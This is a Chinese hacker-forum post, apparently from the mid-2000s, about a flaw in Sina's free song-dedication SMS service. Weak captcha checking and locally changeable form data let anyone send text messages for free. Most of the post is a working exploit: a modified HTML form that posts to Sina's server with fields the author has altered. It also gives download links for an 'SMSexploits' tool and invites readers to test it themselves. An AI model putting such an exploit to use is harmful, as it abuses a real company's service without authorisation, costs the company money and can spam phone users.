漏洞发现者:懒人
[email protected] QQ:76523046 文章来源:华夏黑客同盟
漏洞描述
自从我上次发现新浪网免费点歌的一个小小漏洞,并利用此漏洞做了个免费短信发送软件后,新浪网对此漏洞做了一定的修复,不过一些问题依然是存在的。虽然新浪加了验证码看似堵上了漏洞,可是本地提交并修改数据却还是没有很好的解决,只在短信服务器简单判断一下!所以这个免费发短信的漏洞依然没有解决!我们还是有机会免费发短信的,我现已做出了利用此漏洞的相关工具。此漏洞我以向新浪网反馈,相信很快会对此漏洞做出修复的。
示例:
此代码是基于新浪免费点歌发送页面修改得来的,内容如下:
<Html><head>
<meta http-equiv="Content-type" content="text/html; charset=gb2312">
<title>新浪短信免费点歌服务漏洞测试</title>
<style type="text/Css">
<!--
.style1 {font-size: 12px}
.style2 {
color: #000000;
font-size: 12px;
}
-->
</style>
</head>
<center>
<table width=600 bgcolor=#336799 border=0 cellpadding=0 cellspacing=0>
<tr valign=top><td width=46> </td>
<td width=511 background=web_pic/zhufudd205.gif style="background-repeat:repeat-y" align=center>
<table width=511 border=0 cellpadding=0 cellspacing=0>
<tr valign=top><td width=39 rowspan=2 align=center></td>
<td width=361 rowspan=2 align=center>
<form method="post" action="http://bobo.sina.com.cn/web/get_pwd1.php" onsubmit="return check_form(this);">
<input type="hidden" name="test" value="1">
<input type="hidden" name="id" value="1040110001">
<input type=hidden name="send_sms5" size=8 style="border:#87522A 1px solid" value="庞龙">
<input type=hidden name="send_sms6" size=18 style="border:#87522A 1px solid" value="两只蝴蝶">
<table width=360 border=0 align="center" cellpadding=0 cellspacing=0>
<tr><td width=360 height=30><span class="style1"><font color=#87522A>对方手机号码
<input type=text name="mobilephone" value=13 size=11 maxlength=11 onMouseOver='this.focus();' style="border:#87522A 1px solid">
我的手机号码
<input type=text name="user" value=13 size=11 maxlength=11 onMouseOver='this.focus();' style="border:#87522A 1px solid">
</span></td>
</tr>
<tr><td height=30><span class="style1">
<select style="border:#87522A 1px solid;width:90px" name="send_sms">
<option>Hi,懒人短信漏洞测试</option>
</select>
<input type=text name="send_sms2" onclick="javascript:this.value=''" size=12 maxlength=6 value="填入对方昵称" style="border:#87522A 1px solid" >
<select style="border:#87522A 1px solid;width:100px" name="send_sms3">
<option>在忙什么?我在测试短信</option>
</select>
</span></td>
</tr>
<tr><td height=1 bgcolor=#87522A><span class="style1"></span></td>
</tr>
<tr><td height=21><span class="style1"><font color=#87522A>我是
<input type=text name="send_sms4" onclick="Javascript:this.value=''" size=12 maxlength=6 value="填入自己昵称" style="border:#87522A 1px solid">
祝 <select style="border:#87522A 1px solid;width:90px" name="send_sms7">
<option>心想事成,懒人短信测试</option>
</select>
</span></td>
</tr>
<tr><td height=1 bgcolor=#87522A><span class="style1"></span></td>
</tr>
<tr>
<td height=3><div align="center" class="style1">如果第一次使用验证码使用错误,刷新再试即可</div></td>
</tr>
<tr><td height=1 bgcolor=#87522A><span class="style1"></span></td>
</tr>
<tr><td height=35> <span class="style1"><font color=#87522A>验证码:
<input type=text name="test_img" size=8>
<img src="http://bobo.sina.com.cn/web/image.php?act=init" align=absmiddle> <input type=image src=http://www.5iuu.com/Article/UploadFiles/200412/20041225235232945.gifborder=0 align=absmiddle>
</span></td>
</tr>
<tr><td height=1 bgcolor=#87522A></td></tr>
<tr>
<td height=20><span class="style2">(接受方手机目前只限中国移动用户)</span></td>
</tr>
</table>
</form>
有兴趣的朋友自行测试。
相关eXPloits
测试页面zip包下载:http://lanmen.nease.net/DOWNLOAD/sinatest.zip
测试程序zip包下载:http://lanmen.nease.net/DOWNLOAD/SMSexploits.zip
(出处:http://www.sheup.com)